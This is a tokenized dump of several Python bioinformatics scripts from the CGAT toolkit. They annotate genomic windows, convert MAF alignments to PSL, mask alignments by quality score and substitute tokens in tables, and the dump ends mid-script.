def decorator_stddev_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_min_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def decorator_max_score ( values , start , end , contig ) : <EOL> """<STR_LIT>""" <EOL> d = Stats . DistributionalParameters ( values ) <EOL> return d [ '<STR_LIT>' ] , str ( d ) <EOL> def transform_overlap ( start , end , intervals_with_gff ) : <EOL> """<STR_LIT>""" <EOL> y = Intervals . combineIntervals ( <EOL> map ( lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) , intervals_with_gff ) ) <EOL> return Intervals . pruneIntervals ( y , start , end ) <EOL> def transform_complement ( start , end , intervals_with_gff ) : <EOL> y = Intervals . combineIntervals ( <EOL> map ( lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) , intervals_with_gff ) ) <EOL> return Intervals . complementIntervals ( y , start , end ) <EOL> def transform_third_codon ( start , end , intervals_with_gff ) : <EOL> """<STR_LIT>""" <EOL> intervals = [ ] <EOL> for istart , iend , gff in intervals_with_gff : <EOL> if gff . frame == "<STR_LIT:.>" : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> frame = int ( gff . frame ) <EOL> if Genomics . IsNegativeStrand ( gff . strand ) : <EOL> coordinate_offset = end <EOL> reverse = True <EOL> istart , iend = end - iend , end - istart <EOL> else : <EOL> istart , iend = istart - start , iend - start <EOL> reverse = False <EOL> coordinate_offset = start <EOL> if istart < <NUM_LIT:0> : <EOL> frame = ( frame + istart ) % <NUM_LIT:3> <EOL> istart = <NUM_LIT:0> <EOL> if frame != <NUM_LIT:0> : <EOL> istart -= ( <NUM_LIT:3> - frame ) <EOL> istart += <NUM_LIT:2> <EOL> iend = min ( iend , end - start ) <EOL> for x in range ( istart , iend , <NUM_LIT:3> ) : <EOL> if reverse : <EOL> c = coordinate_offset - x - <NUM_LIT:1> <EOL> else : <EOL> c = coordinate_offset + x <EOL> intervals . append ( ( c , c + <NUM_LIT:1> ) ) <EOL> return Intervals . combineIntervals ( intervals ) <EOL> def test_transform_third_codon ( ) : <EOL> def test_entry ( frame , strand , xfrom , xto , start , end , ref ) : <EOL> entry = GTF . Entry ( ) <EOL> entry . frame = frame <EOL> entry . strand = strand <EOL> entry . start = xfrom <EOL> entry . end = xto <EOL> intervals = transform_third_codon ( start , end , [ ( xfrom , xto , entry ) ] ) <EOL> if ref != intervals : <EOL> print "<STR_LIT>" , ref != intervals <EOL> test_entry ( <NUM_LIT:0> , "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> test_entry ( <NUM_LIT:0> , "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:4> , <NUM_LIT:5> ) ] ) <EOL> test_entry ( <NUM_LIT:1> , "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:4> , <NUM_LIT:5> ) ] ) <EOL> test_entry ( <NUM_LIT:2> , "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:6> ) ] ) <EOL> test_entry ( <NUM_LIT:1> , "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> test_entry ( <NUM_LIT:2> , "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:0> , <NUM_LIT:6> , [ ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:6> ) ] ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def annotateWindows ( contig , windows , gff_data , fasta , options ) : <EOL> """<STR_LIT>""" <EOL> index = IndexedGenome . IndexedGenome ( ) <EOL> for g in gff_data : <EOL> index . add ( g . contig , g . start , g . end , g ) <EOL> is_gtf = options . is_gtf <EOL> if options . transform == "<STR_LIT:none>" : <EOL> transform = lambda x , y , z : map ( lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) , z ) <EOL> elif options . transform == "<STR_LIT>" : <EOL> transform = transform_overlap <EOL> elif options . transform == "<STR_LIT>" : <EOL> transform = transform_complement <EOL> elif options . transform == "<STR_LIT>" : <EOL> transform = transform_third_codon <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % options . transform ) <EOL> work_on_intervals = True <EOL> if options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_counts <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_mean_length <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_median_length <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_percent_coverage <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_percent_gc <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_median_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_mean_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_stddev_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_min_score <EOL> work_on_intervals = False <EOL> elif options . decorator == "<STR_LIT>" : <EOL> decorator = decorator_max_score <EOL> work_on_intervals = False <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % options . decorator ) <EOL> for start , end in windows : <EOL> n1 , l1 , n2 , l2 = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> values , intervals_with_gff , genes , transcripts = [ ] , [ ] , set ( ) , set ( ) <EOL> try : <EOL> for istart , iend , value in index . get ( contig , start , end ) : <EOL> n1 += <NUM_LIT:1> <EOL> l1 += iend - istart <EOL> intervals_with_gff . append ( ( istart , iend , value ) ) <EOL> values . append ( value . score ) <EOL> if is_gtf : <EOL> genes . add ( value . gene_id ) <EOL> transcripts . add ( value . transcript_id ) <EOL> except KeyError : <EOL> pass <EOL> if n1 == <NUM_LIT:0> and options . skip_empty : <EOL> continue <EOL> if work_on_intervals : <EOL> if options . loglevel >= <NUM_LIT:3> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( <EOL> start , end , str ( intervals ) ) ) <EOL> intervals = transform ( start , end , intervals_with_gff ) <EOL> for xstart , xend in intervals : <EOL> n2 += <NUM_LIT:1> <EOL> l2 += xend - xstart <EOL> if options . loglevel >= <NUM_LIT:3> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( <EOL> start , end , str ( intervals ) ) ) <EOL> score , extra_info = decorator ( intervals , start , end , contig , fasta ) <EOL> else : <EOL> if len ( values ) > <NUM_LIT:0> : <EOL> values = map ( float , values ) <EOL> score , extra_info = decorator ( values , start , end , contig ) <EOL> else : <EOL> score , extra_info = <NUM_LIT:0> , None <EOL> l2 = <NUM_LIT:0> <EOL> n2 = <NUM_LIT:0> <EOL> if is_gtf : <EOL> ngenes , ntranscripts = len ( genes ) , len ( transcripts ) <EOL> else : <EOL> ngenes , ntranscripts = <NUM_LIT:0> , <NUM_LIT:0> <EOL> if extra_info : <EOL> extra_info = re . sub ( "<STR_LIT:\t>" , "<STR_LIT:;>" , extra_info ) <EOL> options . stdout . write ( "<STR_LIT:\t>" . join ( <EOL> map ( str , ( contig , start , end , <EOL> ngenes , ntranscripts , <EOL> n1 , l1 , <EOL> n2 , l2 , <EOL> score , <EOL> extra_info ) ) ) + "<STR_LIT:\n>" ) <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if argv is None : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , <EOL> choices = ( <EOL> "<STR_LIT:none>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> genome_file = None , <EOL> filename_windows = None , <EOL> filename_data = None , <EOL> features = [ ] , <EOL> skip_empty = False , <EOL> decorator = "<STR_LIT>" , <EOL> transform = "<STR_LIT:none>" , <EOL> is_gtf = False , <EOL> ) <EOL> ( options , args ) = E . Start ( parser ) <EOL> if not options . filename_windows : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> windows = GTF . readAsIntervals ( <EOL> GTF . iterator ( IOTools . openFile ( options . filename_windows , "<STR_LIT:r>" ) ) ) <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> if options . filename_data : <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> if options . is_gtf : <EOL> gff_data = GTF . readFromFile ( <EOL> IOTools . openFile ( options . filename_data , "<STR_LIT:r>" ) ) <EOL> else : <EOL> gff_data = GTF . readFromFile ( <EOL> IOTOols . openFile ( options . filename_data , "<STR_LIT:r>" ) ) <EOL> if options . loglevel >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> data_ranges = GTF . SortPerContig ( gff_data ) <EOL> else : <EOL> gff_data = None <EOL> data_ranges = None <EOL> options . transform = "<STR_LIT>" <EOL> map_contig2size = { } <EOL> if options . genome_file : <EOL> fasta = IndexedFasta . IndexedFasta ( options . genome_file ) <EOL> map_contig2size = fasta . getContigSizes ( ) <EOL> else : <EOL> for contig , values in windows . items ( ) : <EOL> map_contig2size [ contig ] = max ( lambda x : x [ <NUM_LIT:1> ] , values ) <EOL> fasta = None <EOL> contigs = map_contig2size . keys ( ) <EOL> contigs . sort ( ) <EOL> noutput_contigs , ncontigs_skipped_windows , ncontigs_skipped_data = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> options . stdout . write ( "<STR_LIT:\t>" . join ( <EOL> map ( str , ( "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT:end>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) ) + "<STR_LIT:\n>" ) <EOL> for contig in contigs : <EOL> skip = False <EOL> if contig not in windows : <EOL> ncontigs_skipped_windows += <NUM_LIT:1> <EOL> skip = True <EOL> if data_ranges and contig not in data_ranges : <EOL> ncontigs_skipped_data += <NUM_LIT:1> <EOL> skip = True <EOL> if skip : <EOL> continue <EOL> noutput_contigs += <NUM_LIT:1> <EOL> if data_ranges : <EOL> annotateWindows ( contig , <EOL> windows [ contig ] , <EOL> gff_data [ <EOL> data_ranges [ contig ] [ <NUM_LIT:0> ] : data_ranges [ contig ] [ <NUM_LIT:1> ] ] , <EOL> fasta , <EOL> options ) <EOL> else : <EOL> annotateWindows ( contig , <EOL> windows [ contig ] , <EOL> [ ] , <EOL> fasta , <EOL> options ) <EOL> E . info ( "<STR_LIT>" % <EOL> ( len ( windows ) , noutput_contigs , len ( contigs ) , ncontigs_skipped_windows , ncontigs_skipped_data ) ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> from bx . align import maf <EOL> from bx . align . tools import get_components_for_species <EOL> import CGAT . Blat as Blat <EOL> def threaditer ( reader , species ) : <EOL> '''<STR_LIT>''' <EOL> for m in reader : <EOL> components = get_components_for_species ( m , species ) <EOL> if components is not None : <EOL> yield components <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if not argv : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT:target>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> query = None , <EOL> target = None , <EOL> ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> if options . query is None or options . target is None : <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> options . query , options . target = args <EOL> ninput , nskipped , noutput = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> reader = maf . Reader ( options . stdin ) <EOL> psl = Blat . Match ( ) <EOL> for cc in threaditer ( reader , ( options . query , options . target ) ) : <EOL> ninput += <NUM_LIT:1> <EOL> query , target = cc <EOL> try : <EOL> data = query . src . split ( "<STR_LIT:.>" ) <EOL> qs , qcontig = data [ <NUM_LIT:0> ] , "<STR_LIT:.>" . join ( data [ <NUM_LIT:1> : ] ) <EOL> except ValueError , msg : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( query . src , msg ) ) <EOL> try : <EOL> data = target . src . split ( "<STR_LIT:.>" ) <EOL> ts , tcontig = data [ <NUM_LIT:0> ] , "<STR_LIT:.>" . join ( data [ <NUM_LIT:1> : ] ) <EOL> except ValueError , msg : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( target . src , msg ) ) <EOL> assert qs == options . query <EOL> assert ts == options . target <EOL> psl . mQueryId = qcontig <EOL> psl . mSbjctId = tcontig <EOL> psl . fromPair ( query . start , query . src_size , query . strand , query . text . upper ( ) , <EOL> target . start , target . src_size , target . strand , target . text . upper ( ) ) <EOL> E . debug ( "<STR_LIT>" % <EOL> ( qs , qcontig , query . start , query . src_size , query . strand , query . text ) ) <EOL> E . debug ( "<STR_LIT>" % <EOL> ( ts , tcontig , target . start , target . src_size , target . strand , target . text ) ) <EOL> options . stdout . write ( "<STR_LIT>" % str ( psl ) ) <EOL> noutput += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" % ( ninput , noutput , nskipped ) ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import random <EOL> import alignlib_lite <EOL> import CGAT . Experiment as E <EOL> import CGAT . Blat as Blat <EOL> import CGAT . Iterators as Iterators <EOL> import CGAT . IndexedFasta as IndexedFasta <EOL> def fillAlignment ( map_alignment , alignment ) : <EOL> i = <NUM_LIT:0> <EOL> for x , c in enumerate ( alignment ) : <EOL> if c != "<STR_LIT:->" : <EOL> map_alignment . addPair ( i , x ) <EOL> i += <NUM_LIT:1> <EOL> def main ( argv = None ) : <EOL> parser = E . OptionParser ( <EOL> version = "<STR_LIT>" , usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> quality_threshold = <NUM_LIT> , <EOL> quality_file = "<STR_LIT>" , <EOL> filename_map = None , <EOL> frame = <NUM_LIT:3> , <EOL> ) <EOL> ( options , args ) = E . Start ( parser ) <EOL> infile = open ( options . filename_map ) <EOL> map_genes2genome = { } <EOL> for match in Blat . iterator ( infile ) : <EOL> assert match . mQueryId not in map_genes2genome , "<STR_LIT>" % match . mQueryId <EOL> map_genes2genome [ match . mQueryId ] = match <EOL> infile . close ( ) <EOL> quality = IndexedFasta . IndexedFasta ( options . quality_file ) <EOL> quality . setTranslator ( IndexedFasta . TranslatorBytes ( ) ) <EOL> ninput , noutput , nmissed = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> for line in options . stdin : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> ninput += <NUM_LIT:1> <EOL> cluster_id , gene_id , alignment = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if gene_id not in map_genes2genome : <EOL> nmissed += <NUM_LIT:1> <EOL> E . warn ( "<STR_LIT>" % gene_id ) <EOL> continue <EOL> match = map_genes2genome [ gene_id ] <EOL> map_gene2genome = match . getMapQuery2Target ( ) <EOL> is_negative = match . strand == "<STR_LIT:->" <EOL> if is_negative : <EOL> alignment = alignment [ : : - <NUM_LIT:1> ] <EOL> map_gene2mali = alignlib_lite . py_makeAlignmentVector ( ) <EOL> fillAlignment ( map_gene2mali , alignment ) <EOL> try : <EOL> quality_scores = quality . getSequence ( <EOL> match . mSbjctId , "<STR_LIT:+>" , match . mSbjctFrom , match . mSbjctTo ) <EOL> except ValueError , msg : <EOL> nmissed += <NUM_LIT:1> <EOL> E . warn ( "<STR_LIT>" % <EOL> ( match . mSbjctId , match . mSbjctFrom , match . mSbjctTo , msg ) ) <EOL> continue <EOL> map_mali2genome = alignlib_lite . py_makeAlignmentVector ( ) <EOL> alignlib_lite . py_combineAlignment ( <EOL> map_mali2genome , map_gene2mali , map_gene2genome , alignlib_lite . py_RR ) <EOL> if options . random : <EOL> positions = [ ] <EOL> for fp , c in enumerate ( alignment ) : <EOL> if c == "<STR_LIT:->" : <EOL> continue <EOL> y = map_mali2genome . mapRowToCol ( fp ) - match . mSbjctFrom <EOL> if y < <NUM_LIT:0> : <EOL> continue <EOL> positions . append ( y ) <EOL> scores = [ quality_scores [ x ] for x in positions ] <EOL> random . shuffle ( scores ) <EOL> for p , q in zip ( positions , scores ) : <EOL> quality_scores [ p ] = q <EOL> to_mask = [ ] <EOL> rp = len ( alignment ) <EOL> for fp , c in enumerate ( alignment ) : <EOL> rp -= <NUM_LIT:1> <EOL> if c == "<STR_LIT:->" : <EOL> continue <EOL> y = map_mali2genome . mapRowToCol ( fp ) - match . mSbjctFrom <EOL> if y < <NUM_LIT:0> : <EOL> continue <EOL> if quality_scores [ y ] < options . quality_threshold : <EOL> if is_negative : <EOL> p = rp <EOL> else : <EOL> p = fp <EOL> E . debug ( "<STR_LIT>" % <EOL> ( cluster_id , p , c , match . mSbjctId , match . strand , map_mali2genome . mapRowToCol ( fp ) , quality_scores [ y ] ) ) <EOL> if options . frame > <NUM_LIT:1> : <EOL> start = ( p // options . frame ) * options . frame <EOL> to_mask . extend ( list ( range ( start , start + options . frame ) ) ) <EOL> else : <EOL> to_mask . append ( p ) <EOL> regions = Iterators . group_by_distance ( sorted ( to_mask ) ) <EOL> for start , end in regions : <EOL> options . stdout . write ( "<STR_LIT>" % ( cluster_id , start , end ) ) <EOL> noutput += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" % ( ninput , noutput , nmissed ) ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import re <EOL> import string <EOL> import os <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . Experiment as E <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if not argv : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( create = None , <EOL> regex_token = None , <EOL> pattern_sub = "<STR_LIT:%s>" , <EOL> apply = None , <EOL> invert = False , <EOL> multiple = False , <EOL> columns_token = None , <EOL> filter = None , <EOL> reverse_filter = None , <EOL> inplace = False , <EOL> backup = False , <EOL> regex_rows = None , <EOL> echo = False , <EOL> extended = False , <EOL> keep = False , <EOL> keep_header = False ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> if options . regex_token : <EOL> options . regex_token = re . compile ( options . regex_token ) <EOL> if options . regex_rows : <EOL> options . regex_rows = re . compile ( options . regex_rows ) <EOL> if options . columns_token : <EOL> if options . columns_token != "<STR_LIT:all>" : <EOL> options . columns_token = map ( <EOL> lambda x : int ( x ) - <NUM_LIT:1> , string . split ( options . columns_token , "<STR_LIT:U+002C>" ) ) <EOL> file_id = <NUM_LIT:0> <EOL> keys = { } <EOL> if options . apply : <EOL> infile = IOTools . openFile ( options . apply , "<STR_LIT:r>" ) <EOL> for line in infile : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:#>" : <EOL> continue <EOL> d = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> try : <EOL> a , b = d [ : <NUM_LIT:2> ] <EOL> except ValueError : <EOL> print "<STR_LIT>" % line <EOL> continue <EOL> if options . invert : <EOL> a , b = b , a <EOL> if options . extended : <EOL> b = "<STR_LIT:\t>" . join ( d [ <NUM_LIT:0> ] + d [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> if options . extended : <EOL> b = "<STR_LIT:\t>" . join ( d [ <NUM_LIT:1> : ] ) <EOL> if not keys . has_key ( a ) : <EOL> keys [ a ] = [ ] <EOL> if options . keep : <EOL> b = a + "<STR_LIT:\t>" + b <EOL> keys [ a ] . append ( b ) <EOL> files = args <EOL> if not options . inplace and len ( args ) == <NUM_LIT:0> : <EOL> files = [ "<STR_LIT:->" ] <EOL> for file in files : <EOL> close_infile = False <EOL> close_outfile = False <EOL> if file == "<STR_LIT:->" : <EOL> infile = sys . stdin <EOL> outfile = sys . stdout <EOL> else : <EOL> if options . inplace : <EOL> os . rename ( file , file + "<STR_LIT>" ) <EOL> infile = IOTools . openFile ( file + "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> outfile = IOTools . openFile ( file , "<STR_LIT:w>" ) <EOL> close_infile = True <EOL> close_outfile = True <EOL> else : <EOL> infile = IOTools . openFile ( file , "<STR_LIT:r>" ) <EOL> outfile = sys . stdout <EOL> close_infile = True <EOL> first = True <EOL> for line in infile : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:#>" : <EOL> outfile . write ( line ) <EOL> continue <EOL> if first : <EOL> first = False <EOL> if options . keep_header : <EOL> outfile . write ( line ) <EOL> continue <EOL> if options . regex_rows : <EOL> if options . regex_rows . search ( line ) : <EOL> outfile . write ( line ) <EOL> continue <EOL> new_lines = [ ] <EOL> if options . regex_token : <EOL> r = options . regex_token . search ( line [ : - <NUM_LIT:1> ] ) <EOL> while r : <EOL> key = r . group ( <NUM_LIT:1> ) <EOL> if key not in keys : <EOL> if options . create : <EOL> keys [ key ] = [ options . pattern_sub % str ( len ( keys ) ) ] <EOL> else : <EOL> new_lines . append ( line [ : - <NUM_LIT:1> ] ) <EOL> break <EOL> for k in keys [ key ] : <EOL> new_lines . append ( <EOL> line [ : r . start ( <NUM_LIT:1> ) ] + k + line [ r . end ( <NUM_LIT:1> ) : - <NUM_LIT:1> ] ) <EOL> if options . multiple : <EOL> r = options . regex_token . search ( line [ r . end ( <NUM_LIT:1> ) : - <NUM_LIT:1> ] ) <EOL> else : <EOL> break <EOL> else : <EOL> if not options . filter : <EOL> new_lines . append ( line [ : - <NUM_LIT:1> ] ) <EOL> elif options . columns_token : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if options . columns_token == "<STR_LIT:all>" : <EOL> columns = range ( len ( data ) ) <EOL> else : <EOL> columns = options . columns_token <EOL> keep = not options . reverse_filter <EOL> first_multiple = True <EOL> for c in columns : <EOL> k = data [ c ] <EOL> if k in keys : <EOL> if len ( keys [ k ] ) > <NUM_LIT:1> : <EOL> if not first_multiple : <EOL> raise "<STR_LIT>" % ( <EOL> k , line ) <EOL> first_multiple = False <EOL> for v in keys [ k ] : <EOL> if options . echo : <EOL> data . append ( data [ c ] ) <EOL> data [ c ] = v <EOL> if keep : <EOL> new_lines . append ( string . join ( data , "<STR_LIT:\t>" ) ) <EOL> keep = False <EOL> else : <EOL> if options . create : <EOL> keys [ k ] = [ options . pattern_sub % str ( len ( keys ) ) ] <EOL> data [ c ] = keys [ k ] [ <NUM_LIT:0> ] <EOL> elif options . filter : <EOL> keep = False <EOL> elif options . reverse_filter : <EOL> 